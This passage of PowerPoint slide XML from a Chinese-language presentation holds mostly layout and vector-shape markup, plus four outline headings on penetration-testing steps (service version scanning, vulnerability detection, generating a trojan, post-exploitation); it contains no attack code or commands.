        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="4504690"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="5090160"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.4 漏洞检测</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="5675630"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.5 生成木马</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="6261100"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.6 后渗透攻击</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide2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0" name="组合 49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="258445" y="2941320"/>
            <a:ext cx="11638280" cy="2962910"/>
            <a:chOff x="407" y="2772"/>
            <a:chExt cx="18328" cy="4666"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="Group 3"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="407" y="5987"/>
              <a:ext cx="18328" cy="121"/>
              <a:chOff x="1765833" y="4036682"/>
              <a:chExt cx="9317522" cy="50962"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3" name="Rectangle 4"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3040807" y="4036682"/>
                <a:ext cx="1683494" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="4" name="Rectangle 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4724303" y="4036682"/>
                <a:ext cx="1715155" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5" name="Rectangle 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6435557" y="4036682"/>
                <a:ext cx="1661572" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Rectangle 7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8087643" y="4036682"/>
                <a:ext cx="1720740" cy="50962"/>
              </a:xfrm>
              <a:prstGeom prst="rect">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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Rectangle 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1765833" y="4036682"/>
                <a:ext cx="1274973" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Rectangle 9"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9808382" y="4036682"/>
                <a:ext cx="1274973" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="Group 10"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8057" y="2772"/>
              <a:ext cx="2054" cy="3685"/>
              <a:chOff x="7980911" y="2484779"/>
              <a:chExt cx="1304470" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="10" name="Group 11"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="7980911" y="2484779"/>
                <a:ext cx="1304470" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201204" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="17" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent4"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="18" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630724" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Oval 12"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8347955" y="4239008"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="3810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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="12" name="Group 13"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="8468992" y="4362838"/>
                <a:ext cx="328308" cy="328308"/>
                <a:chOff x="8216107" y="2577307"/>
                <a:chExt cx="464344" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="13" name="AutoShape 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8216107" y="2577307"/>
                  <a:ext cx="464344" cy="464344"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10800 87"/>
                    <a:gd name="T1" fmla="*/ T0 w 21426"/>
                    <a:gd name="T2" fmla="+- 0 10799 73"/>
                    <a:gd name="T3" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T4" fmla="+- 0 10800 87"/>
                    <a:gd name="T5" fmla="*/ T4 w 21426"/>
                    <a:gd name="T6" fmla="+- 0 10799 73"/>
                    <a:gd name="T7" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T8" fmla="+- 0 10800 87"/>
                    <a:gd name="T9" fmla="*/ T8 w 21426"/>
                    <a:gd name="T10" fmla="+- 0 10799 73"/>
                    <a:gd name="T11" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T12" fmla="+- 0 10800 87"/>
                    <a:gd name="T13" fmla="*/ T12 w 21426"/>
                    <a:gd name="T14" fmla="+- 0 10799 73"/>
                    <a:gd name="T15" fmla="*/ 10799 h 21453"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21426" h="21453">
                      <a:moveTo>
                        <a:pt x="8034" y="20112"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5816" y="17892"/>
                        <a:pt x="3556" y="15628"/>
                        <a:pt x="1338" y="13408"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3241" y="7240"/>
                        <a:pt x="11488" y="7509"/>
                        <a:pt x="13391" y="1341"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15609" y="3560"/>
                        <a:pt x="17869" y="5825"/>
                        <a:pt x="20087" y="8045"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18184" y="14212"/>
                        <a:pt x="9937" y="13944"/>
                        <a:pt x="8034" y="20112"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="21034" y="7097"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="14338" y="393"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="14006" y="60"/>
                        <a:pt x="13525" y="-73"/>
                        <a:pt x="13069" y="39"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12828" y="98"/>
                        <a:pt x="12614" y="222"/>
                        <a:pt x="12444" y="393"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12292" y="545"/>
                        <a:pt x="12177" y="733"/>
                        <a:pt x="12112" y="944"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11808" y="1929"/>
                        <a:pt x="11283" y="2785"/>
                        <a:pt x="10507" y="3562"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9471" y="4598"/>
                        <a:pt x="8121" y="5384"/>
                        <a:pt x="6693" y="6214"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5177" y="7094"/>
                        <a:pt x="3611" y="8006"/>
                        <a:pt x="2328" y="9290"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1237" y="10383"/>
                        <a:pt x="493" y="11600"/>
                        <a:pt x="59" y="13011"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-87" y="13488"/>
                        <a:pt x="40" y="14004"/>
                        <a:pt x="391" y="14356"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="7087" y="21060"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7419" y="21393"/>
                        <a:pt x="7900" y="21526"/>
                        <a:pt x="8356" y="21414"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8597" y="21354"/>
                        <a:pt x="8811" y="21231"/>
                        <a:pt x="8981" y="21060"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9133" y="20908"/>
                        <a:pt x="9248" y="20720"/>
                        <a:pt x="9314" y="20508"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9617" y="19523"/>
                        <a:pt x="10142" y="18667"/>
                        <a:pt x="10918" y="17890"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11954" y="16853"/>
                        <a:pt x="13304" y="16069"/>
                        <a:pt x="14733" y="15239"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16248" y="14357"/>
                        <a:pt x="17814" y="13446"/>
                        <a:pt x="19097" y="12162"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20188" y="11070"/>
                        <a:pt x="20932" y="9852"/>
                        <a:pt x="21366" y="8440"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21512" y="7965"/>
                        <a:pt x="21385" y="7448"/>
                        <a:pt x="21034" y="7097"/>
                      </a:cubicBezTo>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14" name="AutoShape 53"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8390732" y="2736850"/>
                  <a:ext cx="125413" cy="130175"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10801 59"/>
                    <a:gd name="T1" fmla="*/ T0 w 21484"/>
                    <a:gd name="T2" fmla="+- 0 10799 41"/>
                    <a:gd name="T3" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T4" fmla="+- 0 10801 59"/>
                    <a:gd name="T5" fmla="*/ T4 w 21484"/>
                    <a:gd name="T6" fmla="+- 0 10799 41"/>
                    <a:gd name="T7" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T8" fmla="+- 0 10801 59"/>
                    <a:gd name="T9" fmla="*/ T8 w 21484"/>
                    <a:gd name="T10" fmla="+- 0 10799 41"/>
                    <a:gd name="T11" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T12" fmla="+- 0 10801 59"/>
                    <a:gd name="T13" fmla="*/ T12 w 21484"/>
                    <a:gd name="T14" fmla="+- 0 10799 41"/>
                    <a:gd name="T15" fmla="*/ 10799 h 21516"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21484" h="21516">
                      <a:moveTo>
                        <a:pt x="17511" y="14987"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="17287" y="15384"/>
                        <a:pt x="17032" y="15740"/>
                        <a:pt x="16731" y="16049"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15340" y="14692"/>
                        <a:pt x="13947" y="13205"/>
                        <a:pt x="12559" y="11675"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12912" y="11521"/>
                        <a:pt x="13287" y="11362"/>
                        <a:pt x="13689" y="11198"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14092" y="11034"/>
                        <a:pt x="14494" y="10927"/>
                        <a:pt x="14895" y="10861"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15308" y="10801"/>
                        <a:pt x="15715" y="10819"/>
                        <a:pt x="16122" y="10913"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16527" y="11011"/>
                        <a:pt x="16909" y="11222"/>
                        <a:pt x="17262" y="11554"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17612" y="11890"/>
                        <a:pt x="17835" y="12244"/>
                        <a:pt x="17923" y="12620"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18020" y="13004"/>
                        <a:pt x="18025" y="13392"/>
                        <a:pt x="17958" y="13789"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17883" y="14187"/>
                        <a:pt x="17738" y="14585"/>
                        <a:pt x="17511" y="14987"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="5799" y="10193"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5096" y="10221"/>
